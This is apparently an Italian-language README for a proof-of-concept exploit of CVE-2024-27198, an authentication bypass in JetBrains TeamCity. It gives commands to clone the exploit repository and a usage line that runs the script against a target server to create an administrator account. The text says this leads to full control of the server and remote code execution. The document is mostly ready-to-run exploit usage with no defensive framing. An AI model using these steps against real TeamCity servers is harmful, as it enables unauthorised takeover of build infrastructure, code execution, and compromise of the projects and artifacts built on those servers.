
PoC su CVE-2024-27198
In JetBrains TeamCity prima della versione 2023.11.4, un bypass di autenticazione che consente di eseguire azioni di amministrazione sul server TeamCity, un attaccante può prendere il controllo completo di tutti i progetti, build, agenti e artefatti di TeamCity, infine l'attaccante eseguirà un RCE.
git clone https://github.com/jrbH4CK/CVE-2024-27198.git
cd CVE-2024-27198
Per creare un account con privilegi di amministratore all'interno del server
python3 cve-2024-27198.py http://example.com username password

